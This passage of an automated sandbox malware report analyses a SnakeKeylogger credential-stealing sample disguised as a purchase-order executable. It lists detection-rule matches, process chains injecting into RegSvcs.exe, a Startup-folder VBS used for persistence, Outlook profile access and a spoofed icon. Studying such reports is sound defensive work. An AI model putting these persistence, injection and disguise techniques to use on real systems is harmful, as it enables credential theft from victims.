              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06490B203_2_06490B20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06498B903_2_06498B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06498BA03_2_06498BA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649F3B83_2_0649F3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064900403_2_06490040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649F8023_2_0649F802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064900063_2_06490006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064950183_2_06495018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649F8103_2_0649F810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D0F83_2_0649D0F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D9993_2_0649D999
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D9A83_2_0649D9A8
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: String function: 00768900 appears 42 times
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: String function: 00747DE1 appears 36 times
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: String function: 00760AE3 appears 70 times
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: String function: 00FA0AE3 appears 70 times
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: String function: 00FA8900 appears 42 times
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: String function: 00F87DE1 appears 35 times
              Source: New Order RFQ- 19A20060.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, --.csBase64 encoded string: 'uPQp7iTDz1NKF5wIsee6Rh0uEunltU+19Xc2TNkI19hWAQqMxqp3fIC4uDdDJmmU'
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, --.csBase64 encoded string: 'uPQp7iTDz1NKF5wIsee6Rh0uEunltU+19Xc2TNkI19hWAQqMxqp3fIC4uDdDJmmU'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AA06A GetLastError,FormatMessageW,0_2_007AA06A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007981CB AdjustTokenPrivileges,CloseHandle,0_2_007981CB
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007987E1
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FD81CB AdjustTokenPrivileges,CloseHandle,1_2_00FD81CB
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FD87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00FD87E1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007AB333
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007BEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007BEE0D
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_007B83BB
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00744E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00744E89
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeFile created: C:\Users\user\AppData\Local\tapestrylikeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeFile created: C:\Users\user\AppData\Local\Temp\aut69F0.tmpJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs"
              Source: New Order RFQ- 19A20060.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002EAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: New Order RFQ- 19A20060.exeVirustotal: Detection: 38%
              Source: New Order RFQ- 19A20060.exeReversingLabs: Detection: 47%
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeFile read: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeProcess created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe"
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe"
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeProcess created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe" Jump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: New Order RFQ- 19A20060.exeStatic file information: File size 1178624 > 1048576
              Source: New Order RFQ- 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: New Order RFQ- 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: New Order RFQ- 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: New Order RFQ- 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: New Order RFQ- 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: New Order RFQ- 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: New Order RFQ- 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wntdll.pdbUGP source: alarmingness.exe, 00000001.00000003.1206468125.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 00000001.00000003.1207010128.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1316072696.0000000003900000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1315012290.0000000003760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: alarmingness.exe, 00000001.00000003.1206468125.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 00000001.00000003.1207010128.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1316072696.0000000003900000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1315012290.0000000003760000.00000004.00001000.00020000.00000000.sdmp
              Source: New Order RFQ- 19A20060.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: New Order RFQ- 19A20060.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: New Order RFQ- 19A20060.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: New Order RFQ- 19A20060.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: New Order RFQ- 19A20060.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00744B37 LoadLibraryA,GetProcAddress,0_2_00744B37
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0074C4C7 push A30074BAh; retn 0074h0_2_0074C50D
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00768945 push ecx; ret 0_2_00768958
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA8945 push ecx; ret 1_2_00FA8958
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeFile created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbsJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon1488.png
